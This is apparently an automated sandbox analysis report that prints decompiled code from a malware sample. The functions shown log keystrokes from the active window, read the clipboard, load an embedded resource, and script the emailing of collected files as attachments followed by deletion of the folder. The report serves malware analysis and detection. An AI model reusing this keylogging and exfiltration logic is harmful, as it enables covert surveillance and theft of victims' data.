                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: H_prolog
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3519838083-0
                                                                                                                                      • Opcode ID: a90edd7dc03a365ed805b8f454bbce693473b5fb98c96565152efc563f58bdab
                                                                                                                                      • Instruction ID: 459f4e919cea2cb56d7d77009b2f2f06380161ef6ec19267f060f02162507471
                                                                                                                                      • Opcode Fuzzy Hash: a90edd7dc03a365ed805b8f454bbce693473b5fb98c96565152efc563f58bdab
                                                                                                                                      • Instruction Fuzzy Hash: 97F03071D1012A9ECF06FB9CC8646DDBBB5FF68618F044019D41267291EF745B49C791
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 79%
                                                                                                                                      			E013063AC(void* __edx, void* __edi) {
                                                                                                                                      				char _v28;
                                                                                                                                      				void* __ebp;
                                                                                                                                      				char* _t11;
                                                                                                                                      				void* _t12;
                                                                                                                                      				void* _t13;
                                                                                                                                      				signed int _t14;
                                                                                                                                      				void* _t16;
                                                                                                                                      
                                                                                                                                      				_t13 = __edi;
                                                                                                                                      				_t12 = __edx;
                                                                                                                                      				_t16 = (_t14 & 0xfffffff8) - 0x18;
                                                                                                                                      				if( *0x132f7cc == 0) {
                                                                                                                                      					_t16 = _t16 - 0xc;
                                                                                                                                      					_t11 =  &_v28;
                                                                                                                                      					E01306283(_t11);
                                                                                                                                      					__imp__GdiplusStartup(0x132f7cc, _t11, 0); // executed
                                                                                                                                      				}
                                                                                                                                      				 *0x132f7c8 =  *0x132f7c8 & 0x00000000;
                                                                                                                                      				E0130C510(_t13, 0x132f7d0, 0, 0x100);
                                                                                                                                      				E0130275A(0x132faa4, _t12, E01306414(_t16 + 0xc, _t12,  *0x132f7c8));
                                                                                                                                      				return E01302755(_t16 + 0xc, _t12,  *0x132f7c8);
                                                                                                                                      			}










                                                                                                                                      0x013063ac
                                                                                                                                      0x013063ac
                                                                                                                                      0x013063b2
                                                                                                                                      0x013063bc
                                                                                                                                      0x013063be
                                                                                                                                      0x013063c1
                                                                                                                                      0x013063c5
                                                                                                                                      0x013063d4
                                                                                                                                      0x013063d4
                                                                                                                                      0x013063da
                                                                                                                                      0x013063ed
                                                                                                                                      0x01306403
                                                                                                                                      0x01306413

                                                                                                                                      APIs
                                                                                                                                      • GdiplusStartup.GDIPLUS(0132F7CC,?,00000000,?,?,?,?,?,01306B69), ref: 013063D4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: GdiplusStartup
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2503201367-0
                                                                                                                                      • Opcode ID: a5a506f88086fd89a9d1900168868a70d72c5316a5ca155481c06060f4713f5f
                                                                                                                                      • Instruction ID: 7025d08d539642b47a462a359eb418af83286027f1f90ba258ea421ac2119239
                                                                                                                                      • Opcode Fuzzy Hash: a5a506f88086fd89a9d1900168868a70d72c5316a5ca155481c06060f4713f5f
                                                                                                                                      • Instruction Fuzzy Hash: C2F01C715402129BD225BA6DED2BB2973AC9B10B1CF50026DE854D51D9EBA0252886D6
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                      			E01304860(char** __ecx, char* __edx, void* __eflags) {
                                                                                                                                      				void* __edi;
                                                                                                                                      				void* __esi;
                                                                                                                                      				void* _t55;
                                                                                                                                      				void* _t59;
                                                                                                                                      				void* _t61;
                                                                                                                                      				void* _t72;
                                                                                                                                      				void* _t73;
                                                                                                                                      				int _t82;
                                                                                                                                      				void* _t84;
                                                                                                                                      				void* _t85;
                                                                                                                                      				void* _t86;
                                                                                                                                      				char* _t87;
                                                                                                                                      				void* _t88;
                                                                                                                                      				signed int _t97;
                                                                                                                                      				char** _t99;
                                                                                                                                      				void* _t147;
                                                                                                                                      				void* _t152;
                                                                                                                                      				void* _t154;
                                                                                                                                      				char** _t155;
                                                                                                                                      				void* _t157;
                                                                                                                                      				char** _t159;
                                                                                                                                      
                                                                                                                                      				_t138 = __edx;
                                                                                                                                      				_t99 = __ecx;
                                                                                                                                      				E01323174(E0132347C, __edx, __eflags);
                                                                                                                                      				_t155 = _t154 - 0x300;
                                                                                                                                      				_t149 = _t99;
                                                                                                                                      				 *(_t152 - 0x14) = _t99;
                                                                                                                                      				 *(_t152 - 4) =  *(_t152 - 4) & 0x00000000;
                                                                                                                                      				_t4 = _t152 - 0x44; // 0x1306afd
                                                                                                                                      				E01302801(_t4);
                                                                                                                                      				_t97 = 1;
                                                                                                                                      				 *(_t152 - 4) = 1;
                                                                                                                                      				_t55 = E01303D8E(0x132fabc);
                                                                                                                                      				_t162 = _t55;
                                                                                                                                      				if(_t55 != 0) {
                                                                                                                                      					L8:
                                                                                                                                      					_t97 = 0;
                                                                                                                                      					__eflags = 0;
                                                                                                                                      				} else {
                                                                                                                                      					_push(L"\\*");
                                                                                                                                      					_t6 = _t152 + 8; // 0x1306b49
                                                                                                                                      					_t138 = _t6;
                                                                                                                                      					_t7 = _t152 - 0x8c; // 0x1306ab5
                                                                                                                                      					_t59 = E013031D6(_t7, _t6, _t162);
                                                                                                                                      					_t8 = _t152 - 0x30c; // 0x1306835
                                                                                                                                      					_t61 = FindFirstFileW(E01302712(_t59, _t162), _t8);
                                                                                                                                      					_t9 = _t152 - 0x8c; // 0x1306ab5
                                                                                                                                      					_t147 = _t61;
                                                                                                                                      					E01302755(_t9, _t6, _t162);
                                                                                                                                      					if(_t147 == 0xffffffff) {
                                                                                                                                      						goto L8;
                                                                                                                                      					} else {
                                                                                                                                      						_t10 = _t152 - 0x30c; // 0x1306835
                                                                                                                                      						if(FindNextFileW(_t147, _t10) != 0) {
                                                                                                                                      							do {
                                                                                                                                      								_t165 =  *(_t152 - 0x30c) & 0x00000010;
                                                                                                                                      								if(( *(_t152 - 0x30c) & 0x00000010) == 0) {
                                                                                                                                      									_t14 = _t152 - 0x2e0; // 0x1306861
                                                                                                                                      									_t15 = _t152 - 0x2c; // 0x1306b15
                                                                                                                                      									_t84 = E013027E1(_t15, _t138, _t14);
                                                                                                                                      									 *(_t152 - 4) = 2;
                                                                                                                                      									_t17 = _t152 - 0x74; // 0x1306acd
                                                                                                                                      									_t85 = E01303294(_t17, L"emObj.AddAttachment(\"", _t165);
                                                                                                                                      									 *(_t152 - 4) = 3;
                                                                                                                                      									_t19 = _t152 - 0x5c; // 0x1306ae5
                                                                                                                                      									 *_t155 = 0x1329c08;
                                                                                                                                      									_t86 = E013031AE(_t19, _t85, _t147, 0x132fabc);
                                                                                                                                      									 *(_t152 - 4) = 4;
                                                                                                                                      									_t87 = E0130333B(_t86, _t84);
                                                                                                                                      									 *(_t152 - 4) = 5;
                                                                                                                                      									_t23 = _t152 - 0xa4; // 0x1306a9d
                                                                                                                                      									_t138 = _t87;
                                                                                                                                      									 *_t155 = L"\")\r\n";
                                                                                                                                      									_t88 = E013031AE(_t23, _t87, _t147);
                                                                                                                                      									_t24 = _t152 - 0x44; // 0x1306afd
                                                                                                                                      									 *(_t152 - 4) = 6;
                                                                                                                                      									E0130271E(_t24, _t147, _t84, _t165, _t88);
                                                                                                                                      									_t26 = _t152 - 0xa4; // 0x1306a9d
                                                                                                                                      									E01302755(_t26, _t87, _t165);
                                                                                                                                      									_t27 = _t152 - 0xbc; // 0x1306a85
                                                                                                                                      									E01302755(_t27, _t87, _t165);
                                                                                                                                      									_t28 = _t152 - 0x5c; // 0x1306ae5
                                                                                                                                      									E01302755(_t28, _t138, _t165);
                                                                                                                                      									_t29 = _t152 - 0x74; // 0x1306acd
                                                                                                                                      									E01302755(_t29, _t138, _t165);
                                                                                                                                      									_t30 = _t152 - 0x2c; // 0x1306b15
                                                                                                                                      									 *(_t152 - 4) = _t97;
                                                                                                                                      									E01302755(_t30, _t138, _t165);
                                                                                                                                      								}
                                                                                                                                      								_t32 = _t152 - 0x30c; // 0x1306835
                                                                                                                                      								_t82 = FindNextFileW(_t147, _t32);
                                                                                                                                      								_t166 = _t82;
                                                                                                                                      							} while (_t82 != 0);
                                                                                                                                      							_t33 = _t152 - 0x14; // 0xffbc23e8
                                                                                                                                      							_t149 =  *_t33;
                                                                                                                                      						}
                                                                                                                                      						_t157 = _t155 - 0x18;
                                                                                                                                      						E01302814(_t157, _t138, _t166, _t149);
                                                                                                                                      						_t34 = _t152 - 0x44; // 0x1306afd
                                                                                                                                      						_push(E01302712(_t34, _t166));
                                                                                                                                      						_t139 = L"\'#attachments#";
                                                                                                                                      						_t35 = _t152 - 0x2c; // 0x1306b15
                                                                                                                                      						E0130275A(_t149, L"\'#attachments#", E01307E44(_t35, L"\'#attachments#", _t166));
                                                                                                                                      						_t36 = _t152 - 0x2c; // 0x1306b15
                                                                                                                                      						E01302755(_t36, L"\'#attachments#", _t166);
                                                                                                                                      						_t159 = _t157 + 0x1c - 0x18;
                                                                                                                                      						 *(_t152 - 0x14) = _t159;
                                                                                                                                      						E01302814(_t159, _t139, _t166, _t149);
                                                                                                                                      						_t38 = _t152 + 8; // 0x1306b49
                                                                                                                                      						 *(_t152 - 4) = 7;
                                                                                                                                      						_t40 = _t152 - 0x5c; // 0x1306ae5
                                                                                                                                      						_t72 = E01303294(_t40, L"FSO.DeleteFolder \"", _t166);
                                                                                                                                      						 *(_t152 - 4) = 8;
                                                                                                                                      						_t42 = _t152 - 0x74; // 0x1306acd
                                                                                                                                      						 *_t159 = "\"";
                                                                                                                                      						_t73 = E013031AE(_t42, _t72, _t147, _t38);
                                                                                                                                      						 *(_t152 - 4) = 9;
                                                                                                                                      						_push(E01302712(_t73, _t166));
                                                                                                                                      						_t138 = L"\'#delattachments#";
                                                                                                                                      						 *(_t152 - 4) = 0xb;
                                                                                                                                      						_t45 = _t152 - 0x2c; // 0x1306b15
                                                                                                                                      						E0130275A(_t149, L"\'#delattachments#", E01307E44(_t45, L"\'#delattachments#", _t166));
                                                                                                                                      						_t46 = _t152 - 0x2c; // 0x1306b15
                                                                                                                                      						E01302755(_t46, L"\'#delattachments#", _t166);
                                                                                                                                      						_t47 = _t152 - 0x74; // 0x1306acd
                                                                                                                                      						E01302755(_t47, _t138, _t166);
                                                                                                                                      						_t48 = _t152 - 0x5c; // 0x1306ae5
                                                                                                                                      						E01302755(_t48, _t138, _t166);
                                                                                                                                      						FindClose(_t147);
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				_t49 = _t152 - 0x44; // 0x1306afd
                                                                                                                                      				E01302755(_t49, _t138, _t166);
                                                                                                                                      				_t50 = _t152 + 8; // 0x1306b49
                                                                                                                                      				E01302755(_t50, _t138, _t166);
                                                                                                                                      				_t51 = _t152 - 0xc; // 0x89645e5f
                                                                                                                                      				 *[fs:0x0] =  *_t51;
                                                                                                                                      				return _t97;
                                                                                                                                      			}
























                                                                                                                                      0x01304860
                                                                                                                                      0x01304860
                                                                                                                                      0x01304865
                                                                                                                                      0x0130486a
                                                                                                                                      0x01304872
                                                                                                                                      0x01304875
                                                                                                                                      0x01304878
                                                                                                                                      0x0130487c
                                                                                                                                      0x0130487f
                                                                                                                                      0x0130488b
                                                                                                                                      0x0130488c
                                                                                                                                      0x0130488f
                                                                                                                                      0x01304894
                                                                                                                                      0x01304896
                                                                                                                                      0x01304a73
                                                                                                                                      0x01304a73
                                                                                                                                      0x01304a73
                                                                                                                                      0x0130489c
                                                                                                                                      0x0130489c
                                                                                                                                      0x013048a1
                                                                                                                                      0x013048a1
                                                                                                                                      0x013048a4
                                                                                                                                      0x013048aa
                                                                                                                                      0x013048b0
                                                                                                                                      0x013048bf
                                                                                                                                      0x013048c5
                                                                                                                                      0x013048cb
                                                                                                                                      0x013048cd
                                                                                                                                      0x013048d5
                                                                                                                                      0x00000000
                                                                                                                                      0x013048db
                                                                                                                                      0x013048db
                                                                                                                                      0x013048eb
                                                                                                                                      0x013048f1
                                                                                                                                      0x013048f1
                                                                                                                                      0x013048f8
                                                                                                                                      0x013048fe
                                                                                                                                      0x01304905
                                                                                                                                      0x01304908
                                                                                                                                      0x01304919
                                                                                                                                      0x0130491d
                                                                                                                                      0x01304920
                                                                                                                                      0x01304925
                                                                                                                                      0x01304929
                                                                                                                                      0x0130492e
                                                                                                                                      0x01304935
                                                                                                                                      0x0130493e
                                                                                                                                      0x01304948
                                                                                                                                      0x0130494d
                                                                                                                                      0x01304951
                                                                                                                                      0x01304957
                                                                                                                                      0x01304959
                                                                                                                                      0x01304960
                                                                                                                                      0x01304967
                                                                                                                                      0x0130496a
                                                                                                                                      0x0130496e
                                                                                                                                      0x01304973
                                                                                                                                      0x01304979
                                                                                                                                      0x0130497e
                                                                                                                                      0x01304984
                                                                                                                                      0x01304989
                                                                                                                                      0x0130498c
                                                                                                                                      0x01304991
                                                                                                                                      0x01304994
                                                                                                                                      0x01304999
                                                                                                                                      0x0130499c
                                                                                                                                      0x0130499f
                                                                                                                                      0x0130499f
                                                                                                                                      0x013049a4
                                                                                                                                      0x013049ac
                                                                                                                                      0x013049b2
                                                                                                                                      0x013049b2
                                                                                                                                      0x013049ba
                                                                                                                                      0x013049ba
                                                                                                                                      0x013049ba
                                                                                                                                      0x013049bd
                                                                                                                                      0x013049c3
                                                                                                                                      0x013049c8
                                                                                                                                      0x013049d0
                                                                                                                                      0x013049d1
                                                                                                                                      0x013049d6
                                                                                                                                      0x013049e4
                                                                                                                                      0x013049e9
                                                                                                                                      0x013049ec
                                                                                                                                      0x013049f1
                                                                                                                                      0x013049f6
                                                                                                                                      0x013049fa
                                                                                                                                      0x013049ff
                                                                                                                                      0x01304a02
                                                                                                                                      0x01304a0c
                                                                                                                                      0x01304a0f
                                                                                                                                      0x01304a14
                                                                                                                                      0x01304a18
                                                                                                                                      0x01304a1d
                                                                                                                                      0x01304a24
                                                                                                                                      0x01304a2a
                                                                                                                                      0x01304a35
                                                                                                                                      0x01304a36
                                                                                                                                      0x01304a3b
                                                                                                                                      0x01304a3f
                                                                                                                                      0x01304a4d
                                                                                                                                      0x01304a52
                                                                                                                                      0x01304a55
                                                                                                                                      0x01304a5a
                                                                                                                                      0x01304a5d
                                                                                                                                      0x01304a62
                                                                                                                                      0x01304a65
                                                                                                                                      0x01304a6b
                                                                                                                                      0x01304a6b
                                                                                                                                      0x013048d5
                                                                                                                                      0x01304a75
                                                                                                                                      0x01304a78
                                                                                                                                      0x01304a7d
                                                                                                                                      0x01304a80
                                                                                                                                      0x01304a85
                                                                                                                                      0x01304a8c
                                                                                                                                      0x01304a95

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 01304865
                                                                                                                                        • Part of subcall function 013031D6: __EH_prolog.LIBCMT ref: 013031DB
                                                                                                                                      • FindFirstFileW.KERNEL32(00000000,01306835,00000000,?,00000000), ref: 013048BF
                                                                                                                                      • FindNextFileW.KERNEL32(00000000,01306835,?,00000000), ref: 013048E3
                                                                                                                                      • FindNextFileW.KERNEL32(00000000,01306835,?,00000000), ref: 013049AC
                                                                                                                                        • Part of subcall function 01303294: __EH_prolog.LIBCMT ref: 01303299
                                                                                                                                      • FindClose.KERNEL32(00000000,00000000), ref: 01304A6B
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Find$FileH_prolog$Next$CloseFirst
                                                                                                                                      • String ID: '#attachments#$'#delattachments#$FSO.DeleteFolder "$emObj.AddAttachment("
                                                                                                                                      • API String ID: 3675027081-312566395
                                                                                                                                      • Opcode ID: 71175466752c971babb51e1ce03d4a0f774261b3ed1726cccedd12c1741f4c6d
                                                                                                                                      • Instruction ID: 3a6760234eda7250d436a7a12707cc771ffcceafacf11ff849caf80b7ef6adc8
                                                                                                                                      • Opcode Fuzzy Hash: 71175466752c971babb51e1ce03d4a0f774261b3ed1726cccedd12c1741f4c6d
                                                                                                                                      • Instruction Fuzzy Hash: 2C5152319001599EDB16FBACD968BEEB7F8AF25608F60809DD445631C1EF742F09CB61
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E01301626(void* __ecx, intOrPtr _a4) {
                                                                                                                                      				long _v8;
                                                                                                                                      				short _v40;
                                                                                                                                      				char _v296;
                                                                                                                                      				void* __edi;
                                                                                                                                      				struct HKL__* _t19;
                                                                                                                                      				void* _t29;
                                                                                                                                      				signed int _t31;
                                                                                                                                      				void* _t35;
                                                                                                                                      				void* _t36;
                                                                                                                                      
                                                                                                                                      				_t29 = __ecx;
                                                                                                                                      				E0130C510(_t36,  &_v296, 0, 0x100);
                                                                                                                                      				_t31 = 8;
                                                                                                                                      				memset( &_v40, 0, _t31 << 2);
                                                                                                                                      				_t19 = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(),  &_v8));
                                                                                                                                      				GetKeyState(0x10);
                                                                                                                                      				GetKeyboardState( &_v296);
                                                                                                                                      				ToUnicodeEx( *(_t29 + 0x54),  *(_t29 + 0x58),  &_v296,  &_v40, 0x10, 0, _t19);
                                                                                                                                      				E013027E1(_a4, _t35,  &_v40);
                                                                                                                                      				return _a4;
                                                                                                                                      			}












                                                                                                                                      0x01301640
                                                                                                                                      0x01301642
                                                                                                                                      0x01301651
                                                                                                                                      0x01301652
                                                                                                                                      0x01301666
                                                                                                                                      0x01301670
                                                                                                                                      0x0130167d
                                                                                                                                      0x01301699
                                                                                                                                      0x013016a6
                                                                                                                                      0x013016b2

                                                                                                                                      APIs
                                                                                                                                      • GetForegroundWindow.USER32(0132F9B4,?), ref: 01301654
                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 0130165F
                                                                                                                                      • GetKeyboardLayout.USER32(00000000), ref: 01301666
                                                                                                                                      • GetKeyState.USER32 ref: 01301670
                                                                                                                                      • GetKeyboardState.USER32(?), ref: 0130167D
                                                                                                                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 01301699
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3566172867-0
                                                                                                                                      • Opcode ID: 34292ca7dfecee90bfca8507923e52fbf26c6d99df667045eeaaa5b83dded786
                                                                                                                                      • Instruction ID: eac1ea368cf39599910b48c377ab5206cdc7868593522ac0bdc8abfdc1d54b57
                                                                                                                                      • Opcode Fuzzy Hash: 34292ca7dfecee90bfca8507923e52fbf26c6d99df667045eeaaa5b83dded786
                                                                                                                                      • Instruction Fuzzy Hash: B801297290020DABDB20EFE5ED49FDA7BACEB0D705F100465F605E6184E675EA588BA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E013074B8(void** __ecx) {
                                                                                                                                      				void* _t3;
                                                                                                                                      				long _t4;
                                                                                                                                      				void** _t5;
                                                                                                                                      				struct HRSRC__* _t7;
                                                                                                                                      
                                                                                                                                      				_t5 = __ecx;
                                                                                                                                      				_t7 = FindResourceA(0, "1", 0xa);
                                                                                                                                      				_t3 = LockResource(LoadResource(0, _t7));
                                                                                                                                      				_t4 = SizeofResource(0, _t7);
                                                                                                                                      				 *_t5 = _t3;
                                                                                                                                      				return _t4;
                                                                                                                                      			}







                                                                                                                                      0x013074c4
                                                                                                                                      0x013074cc
                                                                                                                                      0x013074d8
                                                                                                                                      0x013074e3
                                                                                                                                      0x013074ea
                                                                                                                                      0x013074ee

                                                                                                                                      APIs
                                                                                                                                      • FindResourceA.KERNEL32(00000000,0132A5C8,0000000A), ref: 013074C6
                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,?,?,01307034), ref: 013074D1
                                                                                                                                      • LockResource.KERNEL32(00000000,?,?,?,01307034), ref: 013074D8
                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000,?,?,?,01307034), ref: 013074E3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3473537107-0
                                                                                                                                      • Opcode ID: 0a8fc5bf0b3a840fbe8450e072e0786d19f8403f0581d939013148e7b0cf592b
                                                                                                                                      • Instruction ID: 5d1f5c8b2d0190d461b1ddb56175c1872768ec629bb43acb37ee8f3d7808590d
                                                                                                                                      • Opcode Fuzzy Hash: 0a8fc5bf0b3a840fbe8450e072e0786d19f8403f0581d939013148e7b0cf592b
                                                                                                                                      • Instruction Fuzzy Hash: F9E0EC72740310ABD6302AE17C4DF57BE6CEB85B52F004019F201CA184C6B948408B60
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                      			E01302390(intOrPtr _a4) {
                                                                                                                                      				intOrPtr _v0;
                                                                                                                                      				void* _t9;
                                                                                                                                      				void* _t10;
                                                                                                                                      
                                                                                                                                      				if(OpenClipboard(0) == 0) {
                                                                                                                                      					L3:
                                                                                                                                      					_push(0x1329c7c);
                                                                                                                                      				} else {
                                                                                                                                      					_t10 = GetClipboardData(0xd);
                                                                                                                                      					CloseClipboard();
                                                                                                                                      					if(_t10 == 0) {
                                                                                                                                      						goto L3;
                                                                                                                                      					} else {
                                                                                                                                      						_push(_t10);
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				E013027E1(_a4, _t9);
                                                                                                                                      				return _v0;
                                                                                                                                      			}






                                                                                                                                      0x0130239b
                                                                                                                                      0x013023b4
                                                                                                                                      0x013023b4
                                                                                                                                      0x0130239d
                                                                                                                                      0x013023a5
                                                                                                                                      0x013023a7
                                                                                                                                      0x013023af
                                                                                                                                      0x00000000
                                                                                                                                      0x013023b1
                                                                                                                                      0x013023b1
                                                                                                                                      0x013023b1
                                                                                                                                      0x013023af
                                                                                                                                      0x013023bd
                                                                                                                                      0x013023c7

                                                                                                                                      APIs
                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 01302393
                                                                                                                                      • GetClipboardData.USER32 ref: 0130239F
                                                                                                                                      • CloseClipboard.USER32(?,00000000,00000000), ref: 013023A7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Clipboard$CloseDataOpen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2058664381-0
                                                                                                                                      • Opcode ID: b8443e58c5e287ee78cfe52137524e4f2f26035aca6bce6d4575e902e0541986
                                                                                                                                      • Instruction ID: 8520f4bfda67b5363074f1d4a5c7f9c0014a27aec70b4c7a619e1668a4da26fc
                                                                                                                                      • Opcode Fuzzy Hash: b8443e58c5e287ee78cfe52137524e4f2f26035aca6bce6d4575e902e0541986
                                                                                                                                      • Instruction Fuzzy Hash: 40E0C23424432097D6327F25E82CF8B7BD89F45B59F050518FF0A962D4C770C800CBA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 72%
                                                                                                                                      			E01318DA6(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                      				intOrPtr _v8;
                                                                                                                                      				signed int _v12;
                                                                                                                                      				intOrPtr* _v32;
                                                                                                                                      				CHAR* _v36;
                                                                                                                                      				signed int _v48;
                                                                                                                                      				char _v286;
                                                                                                                                      				signed int _v287;
                                                                                                                                      				struct _WIN32_FIND_DATAA _v332;
                                                                                                                                      				intOrPtr* _v336;
                                                                                                                                      				signed int _v340;
                                                                                                                                      				signed int _v344;
                                                                                                                                      				intOrPtr _v372;
                                                                                                                                      				signed int _t35;
                                                                                                                                      				signed int _t40;
                                                                                                                                      				signed int _t43;
                                                                                                                                      				intOrPtr _t45;
                                                                                                                                      				signed char _t47;
                                                                                                                                      				intOrPtr* _t55;
                                                                                                                                      				union _FINDEX_INFO_LEVELS _t57;
                                                                                                                                      				signed int _t62;
                                                                                                                                      				signed int _t65;
                                                                                                                                      				void* _t72;
                                                                                                                                      				void* _t74;
                                                                                                                                      				signed int _t75;
                                                                                                                                      				void* _t78;
                                                                                                                                      				CHAR* _t79;
                                                                                                                                      				intOrPtr* _t83;
                                                                                                                                      				intOrPtr _t85;
                                                                                                                                      				void* _t87;
                                                                                                                                      				intOrPtr* _t88;
                                                                                                                                      				signed int _t92;
                                                                                                                                      				signed int _t96;
                                                                                                                                      				void* _t101;
                                                                                                                                      				intOrPtr _t102;
                                                                                                                                      				signed int _t105;
                                                                                                                                      				union _FINDEX_INFO_LEVELS _t106;
                                                                                                                                      				void* _t111;
                                                                                                                                      				intOrPtr _t112;
                                                                                                                                      				void* _t113;
                                                                                                                                      				signed int _t118;
                                                                                                                                      				void* _t119;
                                                                                                                                      				signed int _t120;
                                                                                                                                      				void* _t121;
                                                                                                                                      				void* _t122;
                                                                                                                                      
                                                                                                                                      				_push(__ecx);
                                                                                                                                      				_t83 = _a4;
                                                                                                                                      				_t2 = _t83 + 1; // 0x1
                                                                                                                                      				_t101 = _t2;
                                                                                                                                      				do {
                                                                                                                                      					_t35 =  *_t83;
